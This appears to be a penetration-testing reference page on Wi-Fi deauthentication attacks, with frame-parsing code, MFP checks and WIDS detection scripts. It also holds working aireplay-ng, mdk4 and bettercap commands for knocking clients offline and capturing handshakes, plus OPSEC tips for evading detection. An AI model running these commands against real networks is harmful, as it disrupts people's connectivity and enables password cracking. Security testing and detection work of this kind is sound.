# Deauthentication Attacks
## Overview
Deauthentication attacks exploit the unencrypted nature of 802.11 management frames. An attacker can forge a deauthentication frame that appears to come from the AP, causing clients to disconnect. This is used to:
- Force handshake capture — Clients must re-authenticate, generating a new 4-way handshake
- Disconnect specific clients — Targeted denial of service
- Force probe requests — Clients re-scan after disconnecting, revealing hidden SSIDs
- Validate WIDS/WIPS — Test whether the target detects deauth attacks
Management Frame Protection (802.11w / MFP) mitigates this attack on WPA3 and some WPA2 networks, but it's not universally deployed.
## 802.11 Deauthentication Frame Mechanics
The deauthentication frame is a management frame (type 0, subtype 12) sent unencrypted, even on WPA/WPA2 networks. The frame contains:
| Field | Value | Notes |
|---|---|---|
| Type | Management (0) | Unencrypted |
| Subtype | Deauthentication (12) | |
| Address 1 | Destination (client or broadcast) | Broadcast = all clients |
| Address 2 | Source (spoofed AP MAC) | |
| Address 3 | BSSID | |
| Reason Code | 1–39 | Most common: 1 (unspecified), 2 (previous auth invalid), 4 (disassociated due to inactivity), 7 (class 3 frame from non-associated station) |
Critical point: The deauthentication frame is sent in the clear. There is no cryptographic protection for management frames unless 802.11w (MFP) is enabled and required.
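To make the frame layout in the table concrete, here is a small decoder for a bare 802.11 deauthentication frame (no radiotap header). This is an added example written for this page, not code from aircrack-ng or any other tool listed here; the frame bytes and the MAC addresses 02:aa:bb:cc:dd:01 (AP) and 02:11:22:33:44:55 (client) are constructed test vectors.

```python
import struct
from dataclasses import dataclass
from typing import Optional

TYPE_MGMT, SUBTYPE_DEAUTH = 0, 12
BROADCAST = "ff:ff:ff:ff:ff:ff"
# Reason codes the table above calls out most often
REASONS = {1: "unspecified", 2: "previous authentication no longer valid",
           4: "disassociated due to inactivity", 7: "class 3 frame from non-associated STA"}

@dataclass(frozen=True)
class Deauth:
    protected: bool   # Protected Frame bit; always clear for a forged deauth on a link without MFP
    dst: str          # Address 1: targeted client, or broadcast
    src: str          # Address 2: claimed sender (the spoofed AP MAC in an attack)
    bssid: str        # Address 3
    seq: int          # 12-bit sequence number; compare with the AP's real counter
    reason: int       # reason code, 1..39

    @property
    def broadcast(self) -> bool:
        return self.dst == BROADCAST

def _mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(frame: bytes) -> Optional[Deauth]:
    """Decode a bare 802.11 frame (no radiotap); None unless it is a deauthentication frame."""
    if len(frame) < 26:                 # 24-byte MAC header + 2-byte reason code
        return None
    fc, _duration, a1, a2, a3, seqctl = struct.unpack_from("<HH6s6s6sH", frame, 0)
    # Frame Control (little-endian): bits 0-1 version, 2-3 type, 4-7 subtype, bit 14 Protected Frame
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if (ftype, subtype) != (TYPE_MGMT, SUBTYPE_DEAUTH):
        return None
    (reason,) = struct.unpack_from("<H", frame, 24)
    return Deauth(protected=bool(fc & 0x4000), dst=_mac(a1), src=_mac(a2),
                  bssid=_mac(a3), seq=seqctl >> 4, reason=reason)

# Constructed test vectors (made-up MACs): a targeted deauth with reason 7 and seq 1234, and a beacon header
SAMPLE_DEAUTH = bytes.fromhex("c000" "3a01" "021122334455" "02aabbccdd01" "02aabbccdd01" "204d" "0700")
SAMPLE_BEACON_HDR = bytes.fromhex("8000" "0000" "ffffffffffff" "02aabbccdd01" "02aabbccdd01" "a07d" "0000")

if __name__ == "__main__":
    d = parse_deauth(SAMPLE_DEAUTH)
    print(d, "|", REASONS.get(d.reason, "other"), "|", "broadcast" if d.broadcast else "targeted")
```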
## Attack Techniques
### Technique 1: Targeted Deauthentication
Disconnect a specific client from the AP.
```bash
# Deauth a specific client (5 frames)
sudo aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
# Continuous deauth (until Ctrl+C)
sudo aireplay-ng -0 0 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
# -F (--fast): take the first matching packet without prompting; aireplay-ng has no option to set the reason code
sudo aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> -F wlan0mon
```
### Technique 2: Broadcast Deauthentication
Disconnect all clients from the AP. Use with extreme caution — this affects every connected device.
```bash
# Broadcast deauth (10 frames)
sudo aireplay-ng -0 10 -a <AP_MAC> wlan0mon
# Continuous broadcast deauth
sudo aireplay-ng -0 0 -a <AP_MAC> wlan0mon
```
### Technique 3: Deauth with airodump-ng (Handshake Capture)
The most common pattern — deauth plus simultaneous capture.
```bash
# Terminal 1: Start capture
sudo airodump-ng wlan0mon --channel <CH> --bssid <AP_MAC> --write handshake
# Terminal 2: Deauth to force handshake
sudo aireplay-ng -0 5 -a <AP_MAC> wlan0mon
# Watch for "WPA handshake: <AP_MAC>" in the airodump-ng header
```
### Technique 4: MDK4/MDK3 Deauthentication
MDK4 (successor to MDK3) provides more deauthentication options than aireplay-ng.
```bash
# MDK4 deauthentication against every AP seen on the current channel
sudo mdk4 wlan0mon d
# Restrict to the BSSIDs listed in a file (-b = blacklist file, one MAC per line)
sudo mdk4 wlan0mon d -b <bssid_list_file>
# Rate-limit to 1000 packets/s (-s sets the packet rate; it does not randomise the source MAC)
sudo mdk4 wlan0mon d -b <bssid_list_file> -s 1000
# Hop across a channel list (extremely noisy)
sudo mdk4 wlan0mon d -c <channel_list>
```
### Technique 5: bettercap Deauthentication
```bash
# Start bettercap on the monitor interface
sudo bettercap -iface wlan0mon
# Inside the bettercap shell: enable WiFi recon (net.probe/net.recon are the LAN modules, not WiFi)
wifi.recon on
# Deauth a specific client
wifi.deauth <CLIENT_MAC>
# Deauth all clients on an AP
wifi.deauth <AP_MAC>
```
### Technique 6: Hidden SSID Revelation
Deauth forces clients to re-scan and reconnect, revealing hidden SSIDs in their probe requests and association frames.
```bash
# Terminal 1: Capture probe requests
sudo airodump-ng wlan0mon --channel <CH> --write hidden-ssid
# Terminal 2: Deauth clients
sudo aireplay-ng -0 5 -a <AP_MAC> wlan0mon
# Watch for the SSID in probe requests and association frames
# Hidden SSIDs appear as "<length: 0>" until a client connects
```
## Management Frame Protection (802.11w / MFP)
802.11w adds cryptographic integrity and replay protection to management frames, so clients discard forged deauthentication frames and the attack fails.
### Detecting MFP
```bash
# Check scan results for the RSN capabilities line ("MFP-capable", "MFP-required");
# scanning needs a managed-mode interface, not the monitor interface
iw dev <managed_iface> scan | grep -E "SSID:|MFP"
# Or with tshark: beacons are type 0, subtype 8 (0x0008); MFPC/MFPR are RSN capability bits
tshark -r capture.cap -Y 'wlan.fc.type_subtype == 0x0008' \
  -T fields -e wlan.bssid -e wlan.rsn.capabilities.mfpc -e wlan.rsn.capabilities.mfpr
# Interpretation (same 0/1/2 scale as hostapd's ieee80211w setting):
# mfpc=0 mfpr=0 -> 0 = not capable
# mfpc=1 mfpr=0 -> 1 = capable but not required (optional)
# mfpc=1 mfpr=1 -> 2 = required (mandatory)
```
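The same classification can be done offline from the beacon's tagged parameters: walk the information elements, find the RSN IE (element ID 48), and read the MFPC/MFPR bits of its RSN Capabilities word. This is an added example for this page, not aircrack-ng or Wireshark code; the beacon bodies below are constructed (the SSID "corp-wifi" and the three capability words 0x000c/0x008c/0x00cc are made-up test data).

```python
import struct
from typing import Optional

RSN_EID = 48                     # Element ID of the RSN information element
MFPR, MFPC = 0x0040, 0x0080      # RSN Capabilities bit 6 (MFP required) and bit 7 (MFP capable)
LEVELS = {0: "disabled", 1: "optional", 2: "required"}

def find_ie(ies: bytes, eid: int) -> Optional[bytes]:
    """Walk a beacon's tagged-parameter list and return the body of the first element with this ID."""
    i = 0
    while i + 2 <= len(ies):
        tag, length = ies[i], ies[i + 1]
        body = ies[i + 2:i + 2 + length]
        if len(body) < length:       # truncated capture: stop rather than misparse
            return None
        if tag == eid:
            return body
        i += 2 + length
    return None

def rsn_capabilities(rsn: bytes) -> int:
    """RSN Capabilities word; 0 if the element ends before it (then no MFP is advertised)."""
    off = 2 + 4                           # version + group cipher suite
    for _ in range(2):                    # pairwise suite list, then AKM suite list
        if len(rsn) < off + 2:
            return 0
        (count,) = struct.unpack_from("<H", rsn, off)
        off += 2 + 4 * count
    return struct.unpack_from("<H", rsn, off)[0] if len(rsn) >= off + 2 else 0

def mfp_level(ies: bytes) -> int:
    """0 = not capable, 1 = capable but optional, 2 = required; no RSN IE at all (open/WEP/WPA1) gives 0."""
    rsn = find_ie(ies, RSN_EID)
    if rsn is None:
        return 0
    caps = rsn_capabilities(rsn)
    return 2 if caps & MFPR else (1 if caps & MFPC else 0)

# Constructed beacon bodies: SSID IE + RSN IE (WPA2, CCMP, PSK); only the capabilities word differs.
# 0x000c is just the replay-counter bits, 0x008c adds MFPC, 0x00cc adds MFPR (the value iw prints).
_SSID_IE = bytes([0, 9]) + b"corp-wifi"
_RSN_BODY = bytes.fromhex("0100" "000fac04" "0100" "000fac04" "0100" "000fac02")
SAMPLE_IES = {
    name: _SSID_IE + bytes([RSN_EID, 20]) + _RSN_BODY + struct.pack("<H", caps)
    for name, caps in (("disabled", 0x000c), ("optional", 0x008c), ("required", 0x00cc))
}
if __name__ == "__main__":
    for name, ies in SAMPLE_IES.items():
        print(name, "->", LEVELS[mfp_level(ies)])
```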
### MFP Impact on Attacks
| MFP Setting | Deauth Works? | Alternative |
|---|---|---|
| MFP disabled | Yes | Standard deauth |
| MFP optional | Yes (send unencrypted) | Most clients accept unencrypted deauth |
| MFP required | No | Use PMKID capture, evil twin, or client-side attacks |
When MFP is required, deauthentication frames are ignored by clients. Alternative approaches:
- PMKID capture — See PMKID Attack
- Evil twin — See Evil Twin & Rogue AP
- Wait for natural reconnection — Client eventually roams or reconnects
- Client-side attack — Phishing, malicious update, etc.
## Detection and Monitoring
### Detecting Deauth Attacks with tshark
```bash
# Show all deauthentication frames (type 0, subtype 12 = 0x000C)
tshark -r capture.cap -Y 'wlan.fc.type_subtype == 0x000C' \
  -T fields -e frame.time -e wlan.sa -e wlan.da -e wlan.bssid -e wlan.fixed.reason_code
# Count deauth frames by source
tshark -r capture.cap -Y 'wlan.fc.type_subtype == 0x000C' \
  -T fields -e wlan.sa | sort | uniq -c | sort -rn
# Detect rapid deauth bursts (attack indicator): list every second with more than 10 deauth frames
tshark -r capture.cap -Y 'wlan.fc.type_subtype == 0x000C' \
  -T fields -e frame.time_epoch | awk '{print int($1)}' | uniq -c | awk '$1 > 10'
```
### Detecting with airodump-ng
```bash
# airodump-ng's "Lost" column is derived from sequence-number gaps in client frames;
# a rapidly increasing "Lost" count while clients are in range indicates they are being
# knocked off and is an indicator of a deauth attack (confirm with the tshark filter above)
sudo airodump-ng wlan0mon --channel <CH>
```
### WIDS/WIPS Detection
Enterprise wireless intrusion detection systems detect deauth attacks by:
- Deauth frame rate analysis — Normal clients deauth rarely; bursts indicate attacks
- Source MAC analysis — Spoofed AP MACs that don't match known APs
- Sequence number analysis — Deauth frames with out-of-order sequence numbers
- RSSI comparison — Deauth frames from a different physical location than the AP
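Two of the heuristics above, rate analysis and sequence-number analysis, implemented over a list of parsed frames (the fields correspond to the tshark columns used earlier: frame.time_epoch, wlan.sa, wlan.da, wlan.fc.type_subtype, wlan.seq, wlan.fixed.reason_code). This is an added example written for this page, not any WIDS product's logic; SAMPLE is a constructed trace in which a real AP (made-up MAC 02:aa:bb:cc:dd:01) beacons with sequence numbers 2000 onwards while forged deauths claiming the same MAC carry a tool's own counter starting at 1.

```python
from collections import Counter
from dataclasses import dataclass
from typing import List, Tuple

DEAUTH, BEACON = 12, 8
BURST_PER_SEC = 10    # page heuristic: more than 10 deauth frames in one second
SEQ_WINDOW = 50       # plausible 12-bit sequence-number advance between two frames from one MAC

@dataclass(frozen=True)
class Frame:
    t: float          # epoch seconds (frame.time_epoch)
    src: str          # wlan.sa
    dst: str          # wlan.da
    subtype: int      # management subtype: 8 beacon, 12 deauth
    seq: int          # wlan.seq (0..4095)
    reason: int = 0   # wlan.fixed.reason_code, deauth frames only

def deauth_bursts(frames: List[Frame], threshold: int = BURST_PER_SEC) -> List[Tuple[str, int, int]]:
    """(source MAC, second, count) for every second in which one source sent more than `threshold` deauths."""
    per_sec = Counter((f.src, int(f.t)) for f in frames if f.subtype == DEAUTH)
    return sorted((src, sec, n) for (src, sec), n in per_sec.items() if n > threshold)

def seq_anomalies(frames: List[Frame], window: int = SEQ_WINDOW) -> List[Frame]:
    """Deauths whose sequence number does not continue the last non-deauth frame seen from the same MAC.

    A genuine AP deauth follows the AP's beacon counter; a forged one is numbered by the injecting
    tool, so it sits far from the AP's counter or wraps backwards (modulo 4096)."""
    last_seq = {}          # MAC -> sequence number of its most recent beacon/other frame
    flagged = []
    for f in sorted(frames, key=lambda x: x.t):
        if f.subtype != DEAUTH:
            last_seq[f.src] = f.seq
        elif f.src in last_seq and ((f.seq - last_seq[f.src]) % 4096) > window:
            flagged.append(f)
    return flagged

# Constructed trace (made-up MACs): 10 real beacons, 12 forged broadcast deauths inside one second
# with reason 7 and an independent counter, then one genuine AP deauth (reason 4, inactivity).
AP, CLIENT, BCAST = "02:aa:bb:cc:dd:01", "02:11:22:33:44:55", "ff:ff:ff:ff:ff:ff"
SAMPLE = (
    [Frame(100.0 + i / 10, AP, BCAST, BEACON, 2000 + i) for i in range(10)]
    + [Frame(100.25 + i / 20, AP, BCAST, DEAUTH, 1 + i, 7) for i in range(12)]
    + [Frame(101.5, AP, CLIENT, DEAUTH, 2010, 4)]
)

if __name__ == "__main__":
    print("bursts:", deauth_bursts(SAMPLE))
    print("sequence anomalies:", [(f.t, f.seq, f.reason) for f in seq_anomalies(SAMPLE)])
```

The genuine deauth in the sample is flagged by neither check: it is alone in its second and its sequence number follows the AP's last beacon.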
## Common Pitfalls
- Deauth doesn't work (no handshake captured) — MFP may be required. Try PMKID capture instead.
- Client reconnects immediately — This is expected. The goal is to capture the reconnection handshake, not to keep the client offline.
- No visible clients — No clients means no handshake. Use the PMKID attack (no client needed) or wait for clients to connect.
- Wrong channel — Always lock monitor mode to the target channel before deauthing.
- Adapter injection failure — Not all adapters support frame injection. Test with `aireplay-ng -9 wlan0mon`.
## OPSEC Considerations
- Deauth frames are highly visible to WIDS/WIPS
- Broadcast deauth disconnects ALL clients — extremely noisy
- Targeted deauth is less visible but still detectable
- Sequence numbers in forged frames may not match the AP's actual sequence — a detection heuristic
- Deauth bursts create timestamps and patterns that can identify the attacker's physical location
- Time deauth attacks during high-traffic periods for better cover
- Use the minimum number of frames needed (5 is usually sufficient for handshake capture)
## Cross-References
- WPA/WPA2 Cracking — Deauth is primarily used to capture handshakes
- PMKID Attack — Stealthier alternative (no deauth needed)
- Evil Twin & Rogue AP — Alternative when deauth fails (MFP required)
- 01 - Pre-Foothold — Passive survey before deauth
## Tool References
| Tool | Purpose | Link |
|---|---|---|
| aireplay-ng | Deauth frame injection | https://www.aircrack-ng.org/ |
| mdk4 | Advanced deauth and WiFi attacks | https://github.com/aircrack-ng/mdk4 |
| bettercap | WiFi recon and deauth | https://www.bettercap.org/ |
| tshark | Packet analysis and detection | https://www.wireshark.org/ |
| airodump-ng | Capture and monitor | https://www.aircrack-ng.org/ |